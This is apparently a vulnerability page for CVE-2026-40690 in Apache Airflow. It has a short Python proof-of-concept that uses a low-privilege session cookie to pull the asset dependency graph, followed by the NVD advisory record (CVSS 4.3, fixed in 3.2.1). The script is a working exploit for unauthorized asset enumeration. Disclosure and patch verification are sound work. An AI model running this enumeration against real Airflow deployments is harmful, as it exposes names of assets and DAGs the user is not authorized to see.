CVE-2026-40690

import requests # PoC for CVE-2026-40690: Apache Airflow Information Disclosure # This script demonstrates how a user with limited read access can enumerate unauthorized assets. TARGET_HOST = "http://localhost:8080" SESSION_COOKIE = "session=.eJwlz..." # Valid session cookie for a user with read access to at least one DAG def check_asset_disclosure(): headers = { "Cookie": SESSION_COOKIE, "Content-Type": "application/json" } # Endpoint to fetch asset edges (dependency graph) # Vulnerable versions return all assets regardless of specific DAG permissions url = f"{TARGET_HOST}/api/v1/asset/edges" try: response = requests.get(url, headers=headers) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved asset dependency graph.") print(f"[+] Total assets found: {len(data.get('assets', []))}") # Print discovered asset names that might be outside authorized scope for asset in data.get('assets', []): print(f" - Asset ID: {asset.get('id')}, Name: {asset.get('name')}, Type: {asset.get('type')}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": check_asset_disclosure()

{"cve": {"id": "CVE-2026-40690", "sourceIdentifier": "[email protected]", "published": "2026-04-24T13:16:21.443", "lastModified": "2026-04-27T12:24:56.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The asset dependency graph did not restrict nodes by the viewer's DAG read permissions: a user with read access to at least one DAG could browse the asset graph for any other asset in the deployment and learn the existence and names of DAGs and assets outside their authorized scope.\n\nUsers are recommended to upgrade to version 3.2.1, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1220"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.2.1", "matchCriteriaId": "EF856E9C-C3C2-44F3-B2B4-0DD0791C512C"}]}]}], "references": [{"url": "https://github.com/apache/airflow/pull/65273", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://lists.apache.org/thread/bqt7y4g2cpj396b0sd20lv510ff19ndl", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/24/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}